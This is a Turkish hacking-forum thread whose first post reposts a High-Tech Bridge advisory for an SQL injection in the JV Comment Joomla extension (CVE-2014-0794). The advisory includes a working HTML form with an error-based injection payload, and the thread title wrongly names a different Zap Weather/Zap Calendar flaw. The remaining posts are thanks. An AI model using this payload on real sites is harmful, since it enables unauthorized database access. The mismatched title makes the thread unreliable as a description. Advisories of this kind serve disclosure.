Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla Zap Weather FPD & Zap Calendar XSS
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 117
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Joomla Zap Weather FPD & Zap Calendar XSS
01.08.2014 04:33
Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 14, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )


-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.


1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794

The vulnerability exists due to insufficient validation of "id" HTTP POST parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The following exploitation example displays version of MySQL database:



PHP Kod:
<form action="http://[host]/index.php" method="post" name="main">
<
input type="hidden" name="option" value="com_jvcomment">
<
input type="hidden" name="task"   value="comment.like">
<
input type="hidden" name="id"     value="1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))">
<
input type="submit" id="btn">
</
form




Solution:

Update to JV Comment 3.0.3

More Information:
http://extensions.joomla.org/extensions/...ents/23394


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 42
Yaşam Puanı: 1,048 / 1,048
Deneyim: 95 / 100
Rep Sayısı: 1020
Mesaj Sayısı: 2983
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Joomla Zap Weather FPD & Zap Calendar XSS
01.08.2014 07:13
Eline sağlık Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
Stallk3r
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 33
Yaşam Puanı: 742 / 824
Deneyim: 96 / 100
Rep Sayısı: 419
Mesaj Sayısı: 1611
Üyelik Tarihi: 06.11.2013
     
Yorum: #3
Cvp: Joomla Zap Weather FPD & Zap Calendar XSS
01.08.2014 14:52
ellerine sağlık abi Smile

Dans ederken görülenler deli sanılır, Müziği duymayanlar tarafından.
Alinti
malware
*
avatar
Teğmen
Durum: Çevrimdışı
Seviye Puanı: 3
Yaşam Puanı: 0 / 52
Deneyim: 9 / 100
Rep Sayısı: 0
Mesaj Sayısı: 19
Üyelik Tarihi: 09.08.2014
     
Yorum: #4
Cvp: Joomla Zap Weather FPD & Zap Calendar XSS
10.08.2014 17:27
Eline Saglik ABi
Alinti



1 Ziyaretçi